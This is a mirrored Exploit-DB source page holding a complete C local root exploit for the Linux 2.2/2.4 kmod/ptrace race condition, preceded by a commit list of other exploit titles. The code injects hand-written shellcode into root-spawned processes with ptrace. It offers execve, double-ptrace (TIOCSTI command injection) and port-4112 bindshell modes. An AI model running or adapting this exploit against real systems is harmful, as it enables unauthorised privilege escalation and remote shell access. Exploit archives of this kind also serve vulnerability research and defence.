bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/local/22362.c
Offensive Security be496c36bc DB: 2016-07-23 
3 new exploits

Mandrake Linux 8.2 - /usr/mail Local Exploit
/usr/mail (Mandrake Linux 8.2) - Local Exploit

Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)

Linux Kernel 2.2 - (TCP/IP Weakness) Exploit
Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit

CDRecord's ReadCD - Local Root Privileges
CDRecord's ReadCD - Local Root Exploit

NetBSD FTPd / tnftpd Remote Stack Overflow PoC
NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC

Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)

SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities
SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities
NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept
NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept
NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept
NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)

Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)

Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit
Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit

NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)
NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit

NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2)
NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit

FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service
FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service

FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow

NetBSD 1.x TalkD User Validation
NetBSD 1.x TalkD - User Validation

FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition
FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition

Linux Kernel 2.4 - execve() System Call Race Condition PoC
Linux Kernel 2.4 - suid execve() System Call Race Condition PoC

Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)

Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)
Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2)

NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow
NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow

OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service
OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service

Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)
Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)

Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption
Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption

Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities
Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities

Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root
Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit

NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow
NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow

VSAT Sailor 900 - Remote Exploit

Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)

Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation
Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation

Apple OS X Entitlements Rootpipe Privilege Escalation
Apple OS X Entitlements - 'Rootpipe' Privilege Escalation

OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes)
OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)

OS X Install.framework suid root Runner Binary Privilege Escalation
OS X Install.framework - suid root Runner Binary Privilege Escalation

Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit

Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes)
Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)

Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit

Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation
Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation

Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)
Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)

Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)
Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)

Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)
mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)
Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution
2016-07-23 05:07:15 +00:00

309 lines
No EOL
8 KiB
C
Executable file
Raw Blame History

/*
source: http://www.securityfocus.com/bid/7112/info
A vulnerability has been discovered in the Linux kernel which can be exploited using the ptrace() system call. By attaching to an incorrectly configured root process, during a specific time window, it may be possible for an attacker to gain superuser privileges.
The problem occurs due to the kernel failing to restrict trace permissions on specific root spawned processes.
This vulnerability affects both the 2.2 and 2.4 Linux kernel trees.
*/
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4
*
* have fun
*/
#define ANY_SUID "/usr/bin/passwd"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <linux/user.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <asm/ioctls.h>
#include <getopt.h>
// user settings:
int randpids=0;
#define M_SIMPLE 0
#define M_DOUBLE 1
#define M_BIND 2
int mode=M_SIMPLE;
char * bin=NULL;
struct stat me;
int chldpid;
int hackpid;
// flags
int sf=0;
int u2=0;
void killed(int a) { u2=1; }
void synch(int x){ sf=1; }
// shellcode to inject
unsigned char shcode[1024];
char ptrace_code[]="\x31\xc0\xb0\x1a\x31\xdb\xb3\x10\x89\xf9"
"\xcd\x80\x85\xc0\x75\x41\xb0\x72\x89\xfb\x31\xc9\x31\xd2\x31\xf6"
"\xcd\x80\x31\xc0\xb0\x1a\x31\xdb\xb3\x03\x89\xf9\xb2\x30\x89\xe6"
"\xcd\x80\x8b\x14\x24\xeb\x36\x5d\x31\xc0\xb0\xFF\x89\xc7\x83\xc5"
"\xfc\x8b\x75\x04\x31\xc0\xb0\x1a\xb3\x04\xcd\x80\x4f\x83\xed\xfc"
"\x83\xea\xfc\x85\xff\x75\xea\x31\xc0\xb0\x1a\x31\xdb\xb3\x11\x31"
"\xd2\x31\xf6\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xc5\xff"
"\xff\xff";
char execve_tty_code[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68"
"\x2f\x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\xb0\x05\x31\xc9\x66"
"\xb9\x41\x04\x31\xd2\x66\xba\xa4\x01\xcd\x80\x89\xc3\x31\xc0\xb0"
"\x3f\x31\xc9\xb1\x01\xcd\x80\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54"
"\x24\x04\x5b\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8"
"\xe8\xff\xff\xff";
char execve_code[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\xb0\x46"
"\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80"
"\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
char bind_code[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
"\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
"\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
"\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
"\xec\x31\xc0\x50\x66\xb8\x10\x10\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
"\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
"\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
"\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
"\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
"\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
"\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
"\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
// generate shellcode that sets %edi to pid
int pidcode(unsigned char * tgt, unsigned short pid)
{
fprintf(stderr, "pid=%d=0x%08x\n", pid, pid);
tgt[0]=0x31; tgt[1]=0xff;
tgt+=2;
if((pid & 0xff) && (pid & 0xff00)){
tgt[0]=0x66; tgt[1]=0xbf;
*((unsigned short*)(tgt+2))=pid;
return 6;
}else{
int n=2;
if(pid & 0xff00){
tgt[0]=0xB0; tgt[1]=(pid>>8);
tgt+=2; n+=2;
}
memcpy(tgt,"\xC1\xE0\x08", 3); tgt+=3; n+=3;
if(pid & 0xff){
tgt[0]=0xB0; tgt[1]=pid;
tgt+=2; n+=2;
}
tgt[0]=0x89; tgt[1]=0xC7;
return n+2;
}
}
void mkcode(unsigned short pid)
{
int i=0;
unsigned char *c=shcode;
c+=pidcode(c, pid);
strcpy(c, ptrace_code);
c[53]=(sizeof(execve_code)+strlen(bin)+4)/4;
strcat(c, execve_code);
strcat(c, bin);
}
//------------------------
void hack(int pid)
{
int i;
struct user_regs_struct r;
char b1[100]; struct stat st;
int len=strlen(shcode);
if(kill(pid, 0)) return;
sprintf(b1, "/proc/%d/exe", pid);
if(stat(b1, &st)) return;
if(st.st_ino!=me.st_ino || st.st_dev!=me.st_dev) return;
if(ptrace(PTRACE_ATTACH, pid, 0, 0)) return;
while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
fprintf(stderr, "\033[1;33m+ %d\033[0m\n", pid);
if(ptrace(PTRACE_SYSCALL, pid, 0, 0)) goto fail;
while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
for (i=0; i<=len; i+=4)
if(ptrace(PTRACE_POKETEXT, pid, r.eip+i, *(int*)(shcode+i))) goto fail;
kill(chldpid, 9);
ptrace(PTRACE_DETACH, pid, 0, 0);
fprintf(stderr, "\033[1;32m- %d ok!\033[0m\n", pid);
if(mode==M_DOUBLE){
char commands[1024];
char * c=commands;
kill(hackpid, SIGCONT);
sprintf(commands, "\nexport TERM='%s'\nreset\nid\n", getenv("TERM"));
while(*c) { ioctl(0, TIOCSTI, c++); }
waitpid(hackpid, 0, 0);
}
exit(0);
fail:
ptrace(PTRACE_DETACH, pid, 0, 0);
kill(pid, SIGCONT);
}
void usage(char * cmd)
{
fprintf(stderr, "Usage: %s [-d] [-b] [-r] [-s] [-c executable]\n"
"\t-d\t-- use double-ptrace method (to run interactive programs)\n"
"\t-b\t-- start bindshell on port 4112\n"
"\t-r\t-- support randomized pids\n"
"\t-c\t-- choose executable to start\n"
"\t-s\t-- single-shot mode - abort if unsuccessful at the first try\n", cmd);
exit(0);
}
int main(int ac, char ** av, char ** env)
{
int single=0;
char c;
int mypid=getpid();
fprintf(stderr, "Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>\n\n");
if(stat("/proc/self/exe", &me) && stat(av[0], &me)){
perror("stat(myself)");
return 0;
}
while((c=getopt(ac, av, "sbdrc:"))!=EOF) switch(c) {
case 'd': mode=M_DOUBLE; break;
case 'b': mode=M_BIND; break;
case 'r': randpids=1; break;
case 'c': bin=optarg; break;
case 's': single=1; break;
default: usage(av[0]);
}
if(ac!=optind) usage(av[0]);
if(!bin){
if(mode!=M_SIMPLE) bin="/bin/sh";
else{
struct stat qpa;
if(stat((bin="/bin/id"), &qpa)) bin="/usr/bin/id";
}
}
signal(SIGUSR1, synch);
hackpid=0;
switch(mode){
case M_SIMPLE:
fprintf(stderr, "=> Simple mode, executing %s > /dev/tty\n", bin);
strcpy(shcode, execve_tty_code);
strcat(shcode, bin);
break;
case M_DOUBLE:
fprintf(stderr, "=> Double-ptrace mode, executing %s, suid-helper %s\n",
bin, ANY_SUID);
if((hackpid=fork())==0){
char *ble[]={ANY_SUID, NULL};
fprintf(stderr, "Starting suid program %s\n", ANY_SUID);
kill(getppid(), SIGUSR1);
execve(ble[0], ble, env);
kill(getppid(), 9);
perror("execve(SUID)");
_exit(0);
}
while(!sf);
usleep(100000);
kill(hackpid, SIGSTOP);
mkcode(hackpid);
break;
case M_BIND:
fprintf(stderr, "=> portbind mode, executing %s on port 4112\n", bin);
strcpy(shcode, bind_code);
strcat(shcode, bin);
break;
}
fprintf(stderr, "sizeof(shellcode)=%d\n", strlen(shcode));
signal(SIGUSR2, killed);
if(randpids){
fprintf(stderr, "\033[1;31m"
"Randomized pids support enabled... be patient or load the system heavily,\n"
"this method does more brute-forcing\033[0m\n");
}
again:
sf=0;
if((chldpid=fork())==0){
int q;
kill(getppid(), SIGUSR1);
while(!sf);
fprintf(stderr, "=> Child process started");
for(q=0;q<10;++q){
fprintf(stderr, ".");
socket(22,0,0);
}
fprintf(stderr, "\n");
kill(getppid(), SIGUSR2);
_exit(0);
}
while(!sf);
kill(chldpid, SIGUSR1);
for(;;){
int q;
if(randpids){
for(q=1;q<30000;++q)
if(q!=chldpid && q!=mypid && q!=hackpid) hack(q);
}else{
for(q=chldpid+1;q<chldpid+10;q++) hack(q);
}
if(u2){
u2=0;
if(single) break;
goto again;
}
}
fprintf(stderr, "Failed\n");
return 1;
}
// M$ sucks
//
// http://bezkitu.com/
Reference in a new issue View git blame Copy permalink